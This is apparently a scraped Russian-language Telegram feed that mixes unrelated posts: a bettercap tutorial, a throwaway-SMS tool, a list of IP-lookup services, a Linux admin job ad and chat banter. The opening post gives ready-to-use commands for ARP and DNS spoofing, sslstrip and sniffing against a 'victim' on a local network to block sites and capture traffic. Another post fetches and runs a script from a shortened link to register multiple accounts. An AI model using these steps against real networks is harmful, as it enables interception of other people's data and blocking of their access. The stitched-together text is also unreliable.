​Перехват данных и блокировка доступа к сайтам по локальной сети

Приветствую друзья! Сегодня мы будем перехватывать трафик и блокироваь доступ к сайтам через локальную сеть.

Приступаем к установке:
1. Это не работает в Термукс. Для работы мы будем использовать линукс. Запускаем и вводим следующие команды:
• apt-get update
• apt-get upgrade
• apt -y install golang
• apt -y install bettercap

2. Для начала нам надо узнать какие устройства подключены к Wi-FI:
• nmap 192.168.1.1/24(192.168.1.1 это айпи роуетра)/24(это маска сети)

Запускаем Bettercap, с его помощью мы будем перехватывать данные и управлять сетью:
• sudo bettercap

Блокируем сайты.

Пишем через запятую сайты, которые хотим заблокировать:
• set dns.spoof.domains m.vk.com, telegram.org, my.telegram.org

Указываем локальный IP жертвы который мы получили из сканирования NMAP:
• set dns.spoof.address 192.168.1.5
dns.spoof on - START

После того, как мы запустили dns-spoof, жертва не сможет зайти на указанный вами сайт.

3. Далее просматриваем трафик жертвы:
- set http.proxy.sslstrip true
- events.clear
- set net.sniff.verbose false
- set net.sniff.local true
- set arp.spoof.targets IP жертвы
- arp.spoof on
- http.proxy on
- net.sniff on

После этого у вас будут отображаться все пакеты жертвы.

​Получаем бесплатный номер телефона через термукс/линукс

Если вам нужно обезопасить свои данные и вы не хотите использовать личный номер в различных сервисах, то специально для таких как вы существует инструмент Tmpsms. Данная утилита позволяет вам бесплатно получить номер телефона и принимать на него SMS-сообщения.

Таким образом можно зарегистрировать несколько аккаунтов Telegram или Whatsapp. Переходим к делу:

Для запуска:
1. Вводим следующие команды:
• curl -L " https://git.io/tmpsms "  > tmpsms && chmod + x tmpsms
• mv tmpsms \~/bin/

2. Далее чтобы получить номер или просмотреть последние сообщения:
• tmpsms init
• tmpsms --count 5

Удачного вечера!

Всем привет. В Mikrotik RB912R-2nD-LTm&R11e-LTE ставил кто-нибудь R11e-LTE6?

​​Что можно получить, имея только IP-адрес?

Хочу привести пример того, что сможет узнать о Вас злоумышленник имея на руках Ваш айпи-адрес. Сервисы, о которых пойдёт речь абсолютно бесплатны и находятся в открытом доступе.

• IP-score – сайт проверяет на наличие в blacklists определённого айпи.  
• HTMLweb – поможет определить страну, город и район. Дополнительно есть информация о whois-server.
• ipqualityscore – c помощью этого сервиса можно получить информации об использовании прокси, VPN или TOR.
• iknowwhatyoudownload – ресурс для получения информации о использовании торрент трэкеров. Есть возможность создать зараженную ссылку и отправить ее «жертве»..
• xspider-77 – можно получить информацию о занятых портах и уязвимостях.
• Shadow Scanner – определяет операционную систему, название машины, а также дату и время на компьютере.

#sysadmin #сисадмин #офис #спб #fulltime #системныйадминистратор #Linux
Вакансия: Администратор серверов Linux
Где: Санкт-Петербург (Левашовское шоссе)
Формат работы: офис, полная занятость
Оклад: 80 000 - 120 000 руб. плюс ежегодные бонусы и индексация з/п, доплата на питание, страхование жизни и от критических заболеваний, ДМС со стоматологией.
График работы: 1 неделя: с 07:50 до 16:50; 2 неделя: с 15:50 до 22:50.                                                          

Что ожидаем от кандидата:
- Успешный опыт работы в крупных веб-проектах от 3х лет;
- Опыт работы с Linux, Nginx, СУБД Postgres, Apache, MySQL;
- Опыт администрирования web-приложений: прокси-сервера, сервера веб-приложений, базы данных;
- Знание принципов построения и работы компьютерного и коммуникационного оборудования, локальных и глобальных сетей, а также принципов обеспечения информационной безопасности;
- Опыт создания, автоматизации, восстановления резервных копий.

По всем вопросам: @IuliaBogatyreva

Я шарю

я ж написал свой адрес

вакансия как закат классического администрирования.

Почему ?

до 120к.
в чем смысл жить,

Мне сегодня в аутсорсе пытались насиловать по поводу заказчика который на сохо насе всю свою жизнь держал

ещё и 7-50

А тут сохо нас сдох, и хер вытащить данные :)

сохо не приговор.
вот у меня дома вполне себе сохо. но бэкапы это не отменяет.

Денег они за хранения бэкапов не платили :) руководство же тоже еврейское им бесплатно не будет в Хетнцере или где место давать под 1-3тб хлама

и повторюсь, продукция компании микротик явно даёт понять, что норм инфраструктуру можно делать за более-менее сохошные деньги.

было бы желание

Я скинул как можно сиагейт клон сделать на любом диске и скрестить, а дальше сами ебутся

Я раньше и диски с головками воскрешал и прочее с приятелями, но это не прибыльно :)